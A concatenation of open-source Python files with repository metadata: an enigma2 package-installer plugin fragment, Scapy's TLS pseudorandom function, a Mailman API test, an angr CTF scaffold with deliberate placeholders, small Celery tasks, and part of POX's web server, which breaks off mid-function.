    """Selection screen offering a list of package files for installation."""
    skin = """
        <screen name="IpkgInstaller" position="center,center" size="550,450" title="Install extensions" >
            <ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
            <ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
            <widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
            <widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
            <widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
            <widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
            <widget name="list" position="5,50" size="540,360" />
            <ePixmap pixmap="skin_default/div-h.png" position="0,410" zPosition="10" size="560,2" transparent="1" alphatest="on" />
            <widget source="introduction" render="Label" position="5,420" zPosition="10" size="550,30" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
        </screen>"""

    def __init__(self, session, list):
        # 'list' is the list of package file paths to offer; nothing is
        # preselected.
        Screen.__init__(self, session)
        self.list = SelectionList()
        self["list"] = self.list
        for listindex in range(len(list)):
            self.list.addSelection(list[listindex], list[listindex], listindex, False)
        self["key_red"] = StaticText(_("Close"))
        self["key_green"] = StaticText(_("Install"))
        self["key_yellow"] = StaticText()
        self["key_blue"] = StaticText(_("Invert"))
        self["introduction"] = StaticText(_("Press OK to toggle the selection."))
        self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
        {
            "ok": self.list.toggleSelection,
            "cancel": self.close,
            "red": self.close,
            "green": self.install,
            "blue": self.list.toggleAllSelection
        }, -1)

    def install(self):
        # Queue one ipkg install command per selected file and run them.
        list = self.list.getSelectionsList()
        cmdList = []
        for item in list:
            cmdList.append((IpkgComponent.CMD_INSTALL, { "package": item[1] }))
        self.session.open(Ipkg, cmdList = cmdList)
def filescan_open(list, session, **kwargs):
    """Open the installer screen for the filesystem paths of scanned entries."""
    session.open(IpkgInstaller, [entry.path for entry in list])
def filescan(**kwargs):
    # Register a media scanner so package files found on inserted media
    # are offered for installation via IpkgInstaller.
    from Components.Scanner import Scanner, ScanPath
    return \
        Scanner(mimetypes = ["application/x-debian-package"],
                paths_to_scan =
                    [
                        ScanPath(path = "ipk", with_subdirs = True),
                        ScanPath(path = "", with_subdirs = False),
                    ],
                name = "Ipkg",
                description = _("Install extensions."),
                openfnc = filescan_open, )
def UpgradeMain(session, **kwargs):
    # Entry point used by the plugin descriptors: open the main menu.
    session.open(UpdatePluginMenu)
def startSetup(menuid):
    """Menu hook: contribute the Software management entry to the setup menu."""
    if menuid != "setup":
        return []
    if not config.plugins.softwaremanager.onSetupMenu.value:
        return []
    return [(_("Software management"), UpgradeMain, "software_manager", 50)]
def Plugins(path, **kwargs):
    # Plugin entry point: register the Software management UI wherever the
    # user configured it (setup menu, plugin menu, extensions/blue button),
    # plus the filescan hook for package files.
    global plugin_path
    plugin_path = path
    list = [
        PluginDescriptor(name=_("Software management"), description=_("Manage your receiver's software"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc=startSetup),
        PluginDescriptor(name=_("Ipkg"), where = PluginDescriptor.WHERE_FILESCAN, needsRestart = False, fnc = filescan)
    ]
    if not config.plugins.softwaremanager.onSetupMenu.value and not config.plugins.softwaremanager.onBlueButton.value:
        list.append(PluginDescriptor(name=_("Software management"), description=_("Manage your receiver's software"), where = PluginDescriptor.WHERE_PLUGINMENU, needsRestart = False, fnc=UpgradeMain))
    if config.plugins.softwaremanager.onBlueButton.value:
        list.append(PluginDescriptor(name=_("Software management"), description=_("Manage your receiver's software"), where = PluginDescriptor.WHERE_EXTENSIONSMENU, needsRestart = False, fnc=UpgradeMain))
    return list
| vit2/vit-e2 | lib/python/Plugins/SystemPlugins/SoftwareManager/plugin.py | Python | gpl-2.0 | 81,553 |
# This file is part of Scapy
# Copyright (C) 2007, 2008, 2009 Arnaud Ebalard
# 2015, 2016, 2017 Maxence Tury
# This program is published under a GPLv2 license
"""
TLS Pseudorandom Function.
"""
from __future__ import absolute_import
from scapy.error import warning
from scapy.utils import strxor
from scapy.layers.tls.crypto.hash import _tls_hash_algs
from scapy.layers.tls.crypto.h_mac import _tls_hmac_algs
from scapy.modules.six.moves import range
from scapy.compat import bytes_encode
# Data expansion functions
def _tls_P_hash(secret, seed, req_len, hm):
    """P_hash data expansion function (RFC 4346/5246, section 5).

    Iterates the HMAC class `hm` keyed with `secret` over the A(i) chain
    until at least `req_len` bytes are produced, then truncates.

    - secret: the HMAC key (python hmac handles key formatting).
    - seed: the expansion seed.
    - req_len: number of bytes to generate in one call.
    - hm: HMAC class (Hmac_MD5/Hmac_SHA1 for TLS <= 1.1,
      Hmac_SHA256/Hmac_SHA384 for TLS 1.2).
    """
    digest_size = hm.hash_alg.hash_len
    rounds = (req_len + digest_size - 1) // digest_size
    seed = bytes_encode(seed)
    a = hm(secret).digest(seed)            # A(1)
    chunks = []
    for _ in range(rounds):
        chunks.append(hm(secret).digest(a + seed))
        a = hm(secret).digest(a)           # A(i+1)
    return b"".join(chunks)[:req_len]
# Concrete P_hash instantiations, one per HMAC used by the TLS PRFs.

def _tls_P_MD5(secret, seed, req_len):
    return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-MD5"])


def _tls_P_SHA1(secret, seed, req_len):
    return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA"])


def _tls_P_SHA256(secret, seed, req_len):
    return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA256"])


def _tls_P_SHA384(secret, seed, req_len):
    return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA384"])


def _tls_P_SHA512(secret, seed, req_len):
    return _tls_P_hash(secret, seed, req_len, _tls_hmac_algs["HMAC-SHA512"])
# PRF functions, according to the protocol version
def _sslv2_PRF(secret, seed, req_len):
    """SSLv2 key material expansion, based on MD5.

    A single round hashes secret||seed directly; multiple rounds insert an
    ASCII round counter ("0", "1", ...) between secret and seed.
    """
    md5 = _tls_hash_algs["MD5"]()
    rounds = (req_len + md5.hash_len - 1) // md5.hash_len
    if rounds == 1:
        res = md5.digest(secret + seed)
    else:
        res = b"".join(md5.digest(secret + str(i).encode("utf8") + seed)
                       for i in range(rounds))
    return res[:req_len]
def _ssl_PRF(secret, seed, req_len):
    """
    Provides the implementation of SSLv3 PRF function:

     SSLv3-PRF(secret, seed) =
        MD5(secret || SHA-1("A" || secret || seed)) ||
        MD5(secret || SHA-1("BB" || secret || seed)) ||
        MD5(secret || SHA-1("CCC" || secret || seed)) || ...

    With 26 distinct labels, req_len should not be more than 26 x 16 = 416.
    """
    if req_len > 416:
        warning("_ssl_PRF() is not expected to provide more than 416 bytes")
        # Fix: return bytes (b"") instead of str ("") so the error path has
        # the same return type as the normal path.
        return b""

    d = [b"A", b"B", b"C", b"D", b"E", b"F", b"G", b"H", b"I", b"J", b"K", b"L",  # noqa: E501
         b"M", b"N", b"O", b"P", b"Q", b"R", b"S", b"T", b"U", b"V", b"W", b"X",  # noqa: E501
         b"Y", b"Z"]
    res = b""
    hash_sha1 = _tls_hash_algs["SHA"]()
    hash_md5 = _tls_hash_algs["MD5"]()
    rounds = (req_len + hash_md5.hash_len - 1) // hash_md5.hash_len
    for i in range(rounds):
        label = d[i] * (i + 1)
        tmp = hash_sha1.digest(label + secret + seed)
        res += hash_md5.digest(secret + tmp)
    return res[:req_len]
def _tls_PRF(secret, label, seed, req_len):
    """TLS 1.0/1.1 PRF (RFC 4346, section 5).

    PRF(secret, label, seed) = P_MD5(S1, label + seed) XOR
                               P_SHA-1(S2, label + seed)

    S1 and S2 are the two (possibly overlapping) halves of the secret.

    - secret: the HMAC secret; each expansion gets one half.
    - label: context-specific label defined by the RFC.
    - seed: seed for the expansion functions.
    - req_len: amount of keystream to generate.
    """
    half = (len(secret) + 1) // 2
    md5_stream = _tls_P_MD5(secret[:half], label + seed, req_len)
    sha1_stream = _tls_P_SHA1(secret[-half:], label + seed, req_len)
    return strxor(md5_stream, sha1_stream)
def _tls12_SHA256PRF(secret, label, seed, req_len):
    """
    Provides the implementation of TLS 1.2 PRF function as
    defined in section 5 of RFC 5246:

    PRF(secret, label, seed) = P_SHA256(secret, label + seed)

    Parameters are:

    - secret: the *whole* secret used by the HMAC in the expansion
              function (unlike TLS <= 1.1, the secret is not split).
    - label: specific label as defined in various sections of the RFC
             depending on the use of the generated PRF keystream
    - seed: the seed used by the expansion functions.
    - req_len: amount of keystream to be generated
    """
    return _tls_P_SHA256(secret, label + seed, req_len)
def _tls12_SHA384PRF(secret, label, seed, req_len):
    # TLS 1.2 PRF variant for SHA-384 cipher suites (RFC 5246, section 5).
    return _tls_P_SHA384(secret, label + seed, req_len)


def _tls12_SHA512PRF(secret, label, seed, req_len):
    # TLS 1.2 PRF variant built on HMAC-SHA512.
    return _tls_P_SHA512(secret, label + seed, req_len)
class PRF(object):
    """
    The PRF used by SSL/TLS varies based on the version of the protocol and
    (for TLS 1.2) possibly the Hash algorithm of the negotiated cipher suite.
    The various uses of the PRF (key derivation, computation of verify_data,
    computation of pre_master_secret values) for the different versions of the
    protocol also changes. In order to abstract those elements, the common
    _tls_PRF() object is provided. It is expected to be initialised in the
    context of the connection state using the tls_version and the cipher suite.
    """
    def __init__(self, hash_name="SHA256", tls_version=0x0303):
        self.tls_version = tls_version
        self.hash_name = hash_name

        if tls_version < 0x0300:            # SSLv2
            self.prf = _sslv2_PRF
        elif tls_version == 0x0300:         # SSLv3
            self.prf = _ssl_PRF
        elif (tls_version == 0x0301 or      # TLS 1.0
              tls_version == 0x0302):       # TLS 1.1
            self.prf = _tls_PRF
        elif tls_version == 0x0303:         # TLS 1.2
            if hash_name == "SHA384":
                self.prf = _tls12_SHA384PRF
            elif hash_name == "SHA512":
                self.prf = _tls12_SHA512PRF
            else:
                # MD5/SHA-1 suites still use the SHA-256 PRF in TLS 1.2.
                if hash_name in ["MD5", "SHA"]:
                    self.hash_name = "SHA256"
                self.prf = _tls12_SHA256PRF
        else:
            # NOTE: self.prf is left unset in this case.
            warning("Unknown TLS version")

    def compute_master_secret(self, pre_master_secret, client_random,
                              server_random, extms=False, handshake_hash=None):
        """
        Return the 48-byte master_secret, computed from pre_master_secret,
        client_random and server_random. See RFC 5246, section 6.3.
        Supports Extended Master Secret derivation, see RFC 7627.
        """
        seed = client_random + server_random
        label = b'master secret'
        if extms is True and handshake_hash is not None:
            # RFC 7627: bind the master secret to the handshake transcript.
            seed = handshake_hash
            label = b'extended master secret'
        if self.tls_version < 0x0300:
            return None
        elif self.tls_version == 0x0300:
            # The SSLv3 PRF takes no label.
            return self.prf(pre_master_secret, seed, 48)
        else:
            return self.prf(pre_master_secret, label, seed, 48)

    def derive_key_block(self, master_secret, server_random,
                         client_random, req_len):
        """
        Perform the derivation of master_secret into a key_block of req_len
        requested length. See RFC 5246, section 6.3.
        """
        seed = server_random + client_random
        if self.tls_version <= 0x0300:
            return self.prf(master_secret, seed, req_len)
        else:
            return self.prf(master_secret, b"key expansion", seed, req_len)

    def compute_verify_data(self, con_end, read_or_write,
                            handshake_msg, master_secret):
        """
        Return verify_data based on handshake messages, connection end,
        master secret, and read_or_write position. See RFC 5246, section 7.4.9.

        Every TLS 1.2 cipher suite has a verify_data of length 12. Note also::

            "This PRF with the SHA-256 hash function is used for all cipher
            suites defined in this document and in TLS documents published
            prior to this document when TLS 1.2 is negotiated."

        Cipher suites using SHA-384 were defined later on.
        """
        if self.tls_version < 0x0300:
            return None
        elif self.tls_version == 0x0300:
            # SSLv3 computes verify_data with nested MD5/SHA-1 hashing and
            # fixed pads; the label depends on which side sent the message.
            if read_or_write == "write":
                d = {"client": b"CLNT", "server": b"SRVR"}
            else:
                d = {"client": b"SRVR", "server": b"CLNT"}
            label = d[con_end]

            sslv3_md5_pad1 = b"\x36" * 48
            sslv3_md5_pad2 = b"\x5c" * 48
            sslv3_sha1_pad1 = b"\x36" * 40
            sslv3_sha1_pad2 = b"\x5c" * 40

            md5 = _tls_hash_algs["MD5"]()
            sha1 = _tls_hash_algs["SHA"]()

            md5_hash = md5.digest(master_secret + sslv3_md5_pad2 +
                                  md5.digest(handshake_msg + label +
                                             master_secret + sslv3_md5_pad1))
            sha1_hash = sha1.digest(master_secret + sslv3_sha1_pad2 +
                                    sha1.digest(handshake_msg + label +
                                                master_secret + sslv3_sha1_pad1))  # noqa: E501
            verify_data = md5_hash + sha1_hash
        else:
            if read_or_write == "write":
                d = {"client": "client", "server": "server"}
            else:
                d = {"client": "server", "server": "client"}
            label = ("%s finished" % d[con_end]).encode()
            if self.tls_version <= 0x0302:
                # TLS 1.0/1.1: hash the transcript with both MD5 and SHA-1.
                s1 = _tls_hash_algs["MD5"]().digest(handshake_msg)
                s2 = _tls_hash_algs["SHA"]().digest(handshake_msg)
                verify_data = self.prf(master_secret, label, s1 + s2, 12)
            else:
                # TLS 1.2: hash the transcript with the PRF's hash.
                h = _tls_hash_algs[self.hash_name]()
                s = h.digest(handshake_msg)
                verify_data = self.prf(master_secret, label, s, 12)
        return verify_data

    def postprocess_key_for_export(self, key, client_random, server_random,
                                   con_end, read_or_write, req_len):
        """
        Postprocess cipher key for EXPORT ciphersuite, i.e. weakens it.
        An export key generation example is given in section 6.3.1 of RFC 2246.
        See also page 86 of EKR's book.
        """
        # s is True for the client-write/server-read key, False otherwise.
        s = con_end + read_or_write
        s = (s == "clientwrite" or s == "serverread")

        if self.tls_version < 0x0300:
            return None
        elif self.tls_version == 0x0300:
            if s:
                tbh = key + client_random + server_random
            else:
                tbh = key + server_random + client_random
            export_key = _tls_hash_algs["MD5"]().digest(tbh)[:req_len]
        else:
            if s:
                tag = b"client write key"
            else:
                tag = b"server write key"
            export_key = self.prf(key,
                                  tag,
                                  client_random + server_random,
                                  req_len)
        return export_key

    def generate_iv_for_export(self, client_random, server_random,
                               con_end, read_or_write, req_len):
        """
        Generate IV for EXPORT ciphersuite, i.e. weakens it.
        An export IV generation example is given in section 6.3.1 of RFC 2246.
        See also page 86 of EKR's book.
        """
        s = con_end + read_or_write
        s = (s == "clientwrite" or s == "serverread")

        if self.tls_version < 0x0300:
            return None
        elif self.tls_version == 0x0300:
            if s:
                tbh = client_random + server_random
            else:
                tbh = server_random + client_random
            iv = _tls_hash_algs["MD5"]().digest(tbh)[:req_len]
        else:
            # Fix: the empty secret must be bytes (b""), not str, to match
            # the bytes-only PRF/HMAC interfaces (cf. b"IV block" below).
            iv_block = self.prf(b"",
                                b"IV block",
                                client_random + server_random,
                                2 * req_len)
            if s:
                iv = iv_block[:req_len]
            else:
                iv = iv_block[req_len:]
        return iv
| gpotter2/scapy | scapy/layers/tls/crypto/prf.py | Python | gpl-2.0 | 12,924 |
# Copyright (C) 2015 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""API version tests."""
__all__ = [
'TestAPIVersion',
]
import unittest
from mailman.core.system import system
from mailman.testing.helpers import call_api
from mailman.testing.layers import RESTLayer
from urllib.error import HTTPError
class TestAPIVersion(unittest.TestCase):
    """Exercise the /system resource under each supported REST API version."""

    layer = RESTLayer

    def _check_version(self, api_version):
        # Shared assertions for /<api>/system: the reported Mailman and
        # Python versions match the running system, the API version echoes
        # the URL, and self_link points at the versions resource.
        # (Fix: test_api_31/test_api_30 previously duplicated this body.)
        url = 'http://localhost:9001/{}/system'.format(api_version)
        json, response = call_api(url)
        self.assertEqual(json['mailman_version'], system.mailman_version)
        self.assertEqual(json['python_version'], system.python_version)
        self.assertEqual(json['api_version'], api_version)
        self.assertEqual(json['self_link'], '{}/versions'.format(url))

    def test_api_31(self):
        # API version 3.1 was introduced in Mailman 3.1.
        self._check_version('3.1')

    def test_api_30(self):
        # API version 3.0 is still supported.
        self._check_version('3.0')

    def test_bad_api(self):
        # There is no API version earlier than 3.0.
        with self.assertRaises(HTTPError) as cm:
            call_api('http://localhost:9001/2.9/system')
        self.assertEqual(cm.exception.code, 404)
| khushboo9293/mailman | src/mailman/rest/tests/test_api.py | Python | gpl-3.0 | 2,194 |
# This challenge is similar to the previous one. It operates under the same
# premise that you will have to replace the check_equals_ function. In this
# case, however, check_equals_ is called so many times that it wouldn't make
# sense to hook where each one was called. Instead, use a SimProcedure to write
# your own check_equals_ implementation and then hook the check_equals_ symbol
# to replace all calls to scanf with a call to your SimProcedure.
#
# You may be thinking:
# Why can't I just use hooks? The function is called many times, but if I hook
# the address of the function itself (rather than the addresses where it is
# called), I can replace its behavior everywhere. Furthermore, I can get the
# parameters by reading them off the stack (with memory.load(regs.esp + xx)),
# and return a value by simply setting eax! Since I know the length of the
# function in bytes, I can return from the hook just before the 'ret'
# instruction is called, which will allow the program to jump back to where it
# was before it called my hook.
# If you thought that, then congratulations! You have just invented the idea of
# SimProcedures! Instead of doing all of that by hand, you can let the already-
# implemented SimProcedures do the boring work for you so that you can focus on
# writing a replacement function in a Pythonic way.
# As a bonus, SimProcedures allow you to specify custom calling conventions, but
# unfortunately it is not covered in this CTF.
import angr
import claripy
import sys
def main(argv):
  # NOTE: this is CTF scaffold code -- the ??? and ...??? placeholders are
  # intentionally unfilled (the file does not parse as-is) and must be
  # completed by the student.
  path_to_binary = argv[1]
  project = angr.Project(path_to_binary)
  initial_state = project.factory.entry_state()

  # Define a class that inherits angr.SimProcedure in order to take advantage
  # of Angr's SimProcedures.
  class ReplacementCheckEquals(angr.SimProcedure):
    # A SimProcedure replaces a function in the binary with a simulated one
    # written in Python. Other than it being written in Python, the function
    # acts largely the same as any function written in C. Any parameter after
    # 'self' will be treated as a parameter to the function you are replacing.
    # The parameters will be bitvectors. Additionally, the Python can return in
    # the ususal Pythonic way. Angr will treat this in the same way it would
    # treat a native function in the binary returning. An example:
    #
    # int add_if_positive(int a, int b) {
    #   if (a >= 0 && b >= 0) return a + b;
    #   else return 0;
    # }
    #
    # could be simulated with...
    #
    # class ReplacementAddIfPositive(angr.SimProcedure):
    #   def run(self, a, b):
    #     if a >= 0 and b >=0:
    #       return a + b
    #     else:
    #       return 0
    #
    # Finish the parameters to the check_equals_ function. Reminder:
    # int check_equals_AABBCCDDEEFFGGHH(char* to_check, int length) { ...
    # (!)
    def run(self, to_check, ...???):
      # We can almost copy and paste the solution from the previous challenge.
      # Hint: Don't look up the address! It's passed as a parameter.
      # (!)
      user_input_buffer_address = ???
      user_input_buffer_length = ???

      # Note the use of self.state to find the state of the system in a
      # SimProcedure.
      user_input_string = self.state.memory.load(
        user_input_buffer_address,
        user_input_buffer_length
      )

      check_against_string = ???

      # Finally, instead of setting eax, we can use a Pythonic return statement
      # to return the output of this function.
      # Hint: Look at the previous solution.
      return claripy.If(???, ???, ???)

  # Hook the check_equals symbol. Angr automatically looks up the address
  # associated with the symbol. Alternatively, you can use 'hook' instead
  # of 'hook_symbol' and specify the address of the function. To find the
  # correct symbol, disassemble the binary.
  # (!)
  check_equals_symbol = ??? # :string
  project.hook_symbol(check_equals_symbol, ReplacementCheckEquals())

  simulation = project.factory.simgr(initial_state)

  def is_successful(state):
    stdout_output = state.posix.dumps(sys.stdout.fileno())
    return ???

  def should_abort(state):
    stdout_output = state.posix.dumps(sys.stdout.fileno())
    return ???

  simulation.explore(find=is_successful, avoid=should_abort)

  if simulation.found:
    solution_state = simulation.found[0]
    solution = ???
    # Python 2 print statement, as used throughout this scaffold series.
    print solution
  else:
    raise Exception('Could not find the solution')

if __name__ == '__main__':
  main(sys.argv)
| cliffe/SecGen | modules/utilities/unix/ctf/metactf/files/repository/src_angr/dist/scaffold10.py | Python | gpl-3.0 | 4,519 |
from __future__ import absolute_import, unicode_literals
from .celery import app
@app.task
def add(x, y):
    """Celery task: return the sum of x and y."""
    return x + y
@app.task
def mul(x, y):
    """Celery task: return the product of x and y."""
    return x * y
@app.task
def xsum(numbers):
    """Celery task: return the sum of an iterable of numbers."""
    return sum(numbers)
| ginolhac/tutorials | python/advanced/celery/code/ulhpccelery/tasks.py | Python | gpl-3.0 | 224 |
# Copyright 2011,2012 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Webcore is a basic web server framework based on the SocketServer-based
BaseHTTPServer that comes with Python. The big difference is that this
one can carve up URL-space by prefix, such that "/foo/*" gets handled by
a different request handler than "/bar/*". I refer to this as "splitting".
You should also be able to make a request handler written without splitting
run under Webcore. This may not work for all request handlers, but it
definitely works for some. :) The easiest way to do this is with the
wrapRequestHandler() function, like so:
from CGIHTTPServer import CGIHTTPRequestHandler as CHRH
core.WebServer.set_handler("/foo", wrapRequestHandler(CHRH))
.. now URLs under the /foo/ directory will let you browse through the
filesystem next to pox.py. If you create a cgi-bin directory next to
pox.py, you'll be able to run executables in it.
For this specific purpose, there's actually a SplitCGIRequestHandler
which demonstrates wrapping a normal request handler while also
customizing it a bit -- SplitCGIRequestHandler shoehorns in functionality
to use arbitrary base paths.
BaseHTTPServer is not very fast and needs to run on its own thread.
It'd actually be great to have a version of this written against, say,
CherryPy, but I did want to include a simple, dependency-free web solution.
"""
from SocketServer import ThreadingMixIn
from BaseHTTPServer import *
from time import sleep
import select
import threading
import random
import hashlib
import base64
from pox.core import core
import os
import posixpath
import urllib
import cgi
import errno
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
log = core.getLogger()
weblog = log.getChild("server")
def _setAttribs (parent, child):
attrs = ['command', 'request_version', 'close_connection',
'raw_requestline', 'requestline', 'path', 'headers', 'wfile',
'rfile', 'server', 'client_address']
for a in attrs:
setattr(child, a, getattr(parent, a))
setattr(child, 'parent', parent)
import SimpleHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class SplitRequestHandler (BaseHTTPRequestHandler):
  """
  To write HTTP handlers for POX, inherit from this class instead of
  BaseHTTPRequestHandler. The interface should be the same -- the same
  variables should be set, and the same do_GET(), etc. methods should
  be called.

  In addition, there will be a self.args which can be specified
  when you set_handler() on the server.
  """
  # Also a StreamRequestHandler

  def __init__ (self, parent, prefix, args):
    # Clone the connection/request state from the dispatching parent
    # handler instead of running the normal BaseHTTPRequestHandler setup.
    _setAttribs(parent, self)
    self.parent = parent
    self.args = args
    self.prefix = prefix

    self._init()

  def _init (self):
    """
    This is called by __init__ during initialization.  You can
    override it to, for example, parse .args.
    """
    pass

  def handle_one_request (self):
    # The parent handler owns the connection loop; splits never run it.
    raise RuntimeError("Not supported")

  def handle(self):
    raise RuntimeError("Not supported")

  def _split_dispatch (self, command, handler = None):
    # Dispatch to do_GET/do_POST/... on the handler, mirroring
    # BaseHTTPRequestHandler's own method lookup.
    if handler is None: handler = self
    mname = 'do_' + self.command
    if not hasattr(handler, mname):
      self.send_error(501, "Unsupported method (%r)" % self.command)
      return
    method = getattr(handler, mname)
    return method()

  # Logging goes through POX's logger, tagged with the split prefix.
  def log_request (self, code = '-', size = '-'):
    weblog.debug(self.prefix + (':"%s" %s %s' %
                 (self.requestline, str(code), str(size))))

  def log_error (self, fmt, *args):
    weblog.error(self.prefix + ':' + (fmt % args))

  def log_message (self, fmt, *args):
    weblog.info(self.prefix + ':' + (fmt % args))
# 16x16 GIF favicon, stored as a hex string and decoded to a raw byte
# string below (Python 2: str is bytes).
_favicon = ("47494638396110001000c206006a5797927bc18f83ada9a1bfb49ceabda"
  + "4f4ffffffffffff21f904010a0007002c000000001000100000034578badcfe30b20"
  + "1c038d4e27a0f2004e081e2172a4051942abba260309ea6b805ab501581ae3129d90"
  + "1275c6404b80a72f5abcd4a2454cb334dbd9e58e74693b97425e07002003b")
# Decode each pair of hex digits into one character.
_favicon = ''.join([chr(int(_favicon[n:n+2],16))
                    for n in xrange(0,len(_favicon),2)])
class CoreHandler (SplitRequestHandler):
  """
  A default page to say hi from POX.
  """
  def do_GET (self):
    """Serve a GET request."""
    self.do_content(True)

  def do_HEAD (self):
    """Serve a HEAD request."""
    self.do_content(False)

  def do_content (self, is_get):
    # Route to the info page, the favicon, or a 404; is_get controls
    # whether a body is written (HEAD sends headers only).
    if self.path == "/":
      self.send_info(is_get)
    elif self.path.startswith("/favicon."):
      self.send_favicon(is_get)
    else:
      self.send_error(404, "File not found on CoreHandler")

  def send_favicon (self, is_get = False):
    self.send_response(200)
    self.send_header("Content-type", "image/gif")
    self.send_header("Content-Length", str(len(_favicon)))
    self.end_headers()
    if is_get:
      self.wfile.write(_favicon)

  def send_info (self, is_get = False):
    # Render a small HTML page listing POX components and the registered
    # web prefixes.
    r = "<html><head><title>POX</title></head>\n"
    r += "<body>\n<h1>POX Webserver</h1>\n<h2>Components</h2>\n"
    r += "<ul>"
    for k in sorted(core.components):
      v = core.components[k]
      r += "<li>%s - %s</li>\n" % (cgi.escape(str(k)), cgi.escape(str(v)))
    r += "</ul>\n\n<h2>Web Prefixes</h2>"
    r += "<ul>"
    m = [map(cgi.escape, map(str, [x[0],x[1],x[3]]))
         for x in self.args.matches]
    m.sort()
    for v in m:
      r += "<li><a href='{0}'>{0}</a> - {1} {2}</li>\n".format(*v)
    r += "</ul></body></html>\n"

    self.send_response(200)
    self.send_header("Content-type", "text/html")
    self.send_header("Content-Length", str(len(r)))
    self.end_headers()
    if is_get:
      self.wfile.write(r)
class StaticContentHandler (SplitRequestHandler, SimpleHTTPRequestHandler):
# We slightly modify SimpleHTTPRequestHandler to serve from given
# directories and inherit from from Python, but
# modified to serve from given directories and to inherit from
# SplitRequestHandler.
"""
A SplitRequestHandler for serving static content
This is largely the same as the Python SimpleHTTPRequestHandler, but
we modify it to serve from arbitrary directories at arbitrary
positions in the URL space.
"""
server_version = "StaticContentHandler/1.0"
def send_head (self):
# We override this and handle the directory redirection case because
# we want to include the per-split prefix.
path = self.translate_path(self.path)
if os.path.isdir(path):
if not self.path.endswith('/'):
self.send_response(301)
self.send_header("Location", self.prefix + self.path + "/")
self.end_headers()
return None
return SimpleHTTPRequestHandler.send_head(self)
def list_directory (self, dirpath):
# dirpath is an OS path
try:
d = os.listdir(dirpath)
except OSError as e:
if e.errno == errno.EACCES:
self.send_error(403, "This directory is not listable")
elif e.errno == errno.ENOENT:
self.send_error(404, "This directory does not exist")
else:
self.send_error(400, "Unknown error")
return None
d.sort(key=str.lower)
r = StringIO()
r.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\n")
path = posixpath.join(self.prefix, cgi.escape(self.path).lstrip("/"))
r.write("<html><head><title>" + path + "</title></head>\n")
r.write("<body><pre>")
parts = path.rstrip("/").split("/")
r.write('<a href="/">/</a>')
for i,part in enumerate(parts):
link = urllib.quote("/".join(parts[:i+1]))
if i > 0: part += "/"
r.write('<a href="%s">%s</a>' % (link, cgi.escape(part)))
r.write("\n" + "-" * (0+len(path)) + "\n")
dirs = []
files = []
for f in d:
if f.startswith("."): continue
if os.path.isdir(os.path.join(dirpath, f)):
dirs.append(f)
else:
files.append(f)
def entry (n, rest=''):
link = urllib.quote(n)
name = cgi.escape(n)
r.write('<a href="%s">%s</a>\n' % (link,name+rest))
for f in dirs:
entry(f, "/")
for f in files:
entry(f)
r.write("</pre></body></html>")
r.seek(0)
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", str(len(r.getvalue())))
self.end_headers()
return r
def translate_path (self, path, include_prefix = True):
    """
    Translate a web-path to a local filesystem path

    Odd path elements (e.g., ones that contain local filesystem path
    separators) are stripped, and a ".." component cancels the component
    before it, so a request can never climb above the configured root.
    """
    def fixpath (p):
        # Walk the path right-to-left collecting sane components.
        o = []
        skip = 0  # number of components consumed by a later '..'
        while True:
            p, tail = posixpath.split(p)
            if p in ('/', '') and tail == '':
                break
            # Drop empty / current-dir components and anything that looks
            # like a local filesystem path (separators, drive letters).
            if tail in ('', '.', os.path.curdir):
                continue
            if os.path.sep in tail:
                continue
            if os.path.altsep and os.path.altsep in tail:
                continue
            if os.path.splitdrive(tail)[0] != '':
                continue
            if tail == '..':
                # BUGFIX: os.path.pardir ('..') used to be included in the
                # skip-tuple above, which made this branch unreachable and
                # silently dropped '..' instead of cancelling the previous
                # component; now 'a/../b' correctly resolves to 'b'.
                skip += 1
                continue
            if skip:
                skip -= 1
                continue
            o.append(tail)
        o.reverse()
        return o
    # Remove query string / fragment
    if "?" in path: path = path[:path.index("?")]
    if "#" in path: path = path[:path.index("#")]
    path = fixpath(path)
    if path:
        path = os.path.join(*path)
    else:
        path = ''
    if include_prefix:
        # Anchor the sanitized relative path under the configured root.
